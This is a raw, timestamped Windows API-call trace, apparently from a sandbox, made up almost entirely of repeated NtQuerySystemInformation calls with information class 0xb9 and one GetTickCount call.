NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dcd0, Length=0x58, ResultLength=0x0) [0233.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc10, Length=0x20, ResultLength=0x0) [0233.561] GetTickCount () returned 0x117aec1 [0233.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dac8, Length=0x58, ResultLength=0x0) [0233.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9e0, Length=0x38, ResultLength=0x0) [0233.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d810, Length=0x28, ResultLength=0x0) [0233.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d810, Length=0x28, ResultLength=0x0) [0233.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d810, Length=0x28, ResultLength=0x0) [0233.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d810, Length=0x28, ResultLength=0x0) [0233.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d880, Length=0x28, ResultLength=0x0) [0233.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9e0, Length=0x38, ResultLength=0x0) [0233.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d900, Length=0x28, ResultLength=0x0) [0233.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d900, Length=0x28, ResultLength=0x0) [0233.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9e0, Length=0x38, ResultLength=0x0) [0233.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d860, Length=0x20, ResultLength=0x0) [0233.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d7e0, Length=0x20, ResultLength=0x0) [0233.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d7e0, Length=0x20, ResultLength=0x0) [0233.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d7e0, Length=0x20, ResultLength=0x0) [0233.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9e0, Length=0x38, ResultLength=0x0) [0233.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d860, Length=0x20, ResultLength=0x0) [0233.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d7f0, Length=0x20, ResultLength=0x0) [0233.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d7f0, Length=0x20, ResultLength=0x0) [0233.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dac8, Length=0x58, ResultLength=0x0) [0233.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9a0, Length=0x38, ResultLength=0x0) [0233.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d7e0, Length=0x28, ResultLength=0x0) [0233.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d7e0, Length=0x28, ResultLength=0x0) [0233.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d7e0, Length=0x28, ResultLength=0x0) [0233.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d7e0, Length=0x28, ResultLength=0x0) [0233.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d850, Length=0x28, ResultLength=0x0) [0233.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9a0, Length=0x38, ResultLength=0x0) [0233.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9a0, Length=0x38, ResultLength=0x0) [0233.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d8d0, Length=0x28, ResultLength=0x0) [0233.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d8d0, Length=0x28, ResultLength=0x0) [0233.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9a0, Length=0x38, ResultLength=0x0) [0233.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9a0, Length=0x38, ResultLength=0x0) [0233.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d740, Length=0x20, ResultLength=0x0) [0233.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d6c0, Length=0x20, ResultLength=0x0) [0233.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d6c0, Length=0x20, ResultLength=0x0) [0233.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d6c0, Length=0x20, ResultLength=0x0) [0233.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d910, Length=0x20, ResultLength=0x0) [0233.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9a0, Length=0x38, ResultLength=0x0) [0233.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d830, Length=0x20, ResultLength=0x0) [0233.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d7b0, Length=0x20, ResultLength=0x0) [0233.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d7b0, Length=0x20, ResultLength=0x0) [0233.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d7b0, Length=0x20, ResultLength=0x0) [0233.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9a0, Length=0x38, ResultLength=0x0) [0233.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d830, Length=0x20, ResultLength=0x0) [0233.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d7b0, Length=0x20, ResultLength=0x0) [0233.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d7b0, Length=0x20, ResultLength=0x0) [0233.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d7b0, Length=0x20, ResultLength=0x0) [0233.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9a0, Length=0x38, ResultLength=0x0) [0233.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d830, Length=0x20, ResultLength=0x0) [0233.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d7c0, Length=0x20, ResultLength=0x0) [0233.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d7c0, Length=0x20, ResultLength=0x0) [0233.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dac8, Length=0x58, ResultLength=0x0) [0233.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d990, Length=0x58, ResultLength=0x0) [0233.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d8b0, Length=0x38, ResultLength=0x0) [0233.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d6e0, Length=0x28, ResultLength=0x0) [0233.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d6e0, Length=0x28, ResultLength=0x0) [0233.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d6e0, Length=0x28, ResultLength=0x0) [0233.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d6e0, Length=0x28, ResultLength=0x0) [0233.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d750, Length=0x28, ResultLength=0x0) [0233.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d8b0, Length=0x38, ResultLength=0x0) [0233.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d7d0, Length=0x28, ResultLength=0x0) [0233.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d7d0, Length=0x28, ResultLength=0x0) [0233.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d8b0, Length=0x38, ResultLength=0x0) [0233.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d730, Length=0x20, ResultLength=0x0) [0233.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d6b0, Length=0x20, ResultLength=0x0) [0233.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d6b0, Length=0x20, ResultLength=0x0) [0233.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d6b0, Length=0x20, ResultLength=0x0) [0233.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d8b0, Length=0x38, ResultLength=0x0) [0233.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d730, Length=0x20, ResultLength=0x0) [0233.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d6c0, Length=0x20, ResultLength=0x0) [0233.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d6c0, Length=0x20, ResultLength=0x0) [0233.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d990, Length=0x58, ResultLength=0x0) [0233.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d8b0, Length=0x38, ResultLength=0x0) [0233.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d6e0, Length=0x28, ResultLength=0x0) [0233.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d6e0, Length=0x28, ResultLength=0x0) [0233.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d6e0, Length=0x28, ResultLength=0x0) [0233.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d6e0, Length=0x28, ResultLength=0x0) [0233.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d750, Length=0x28, ResultLength=0x0) [0233.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d8b0, Length=0x38, ResultLength=0x0) [0233.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d7d0, Length=0x28, ResultLength=0x0) [0233.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d7d0, Length=0x28, ResultLength=0x0) [0233.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d670, Length=0x20, ResultLength=0x0) [0233.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d5f0, Length=0x20, ResultLength=0x0) [0233.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d5f0, Length=0x20, ResultLength=0x0) [0233.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d5f0, Length=0x20, ResultLength=0x0) [0233.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d8b0, Length=0x38, ResultLength=0x0) [0233.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.607] 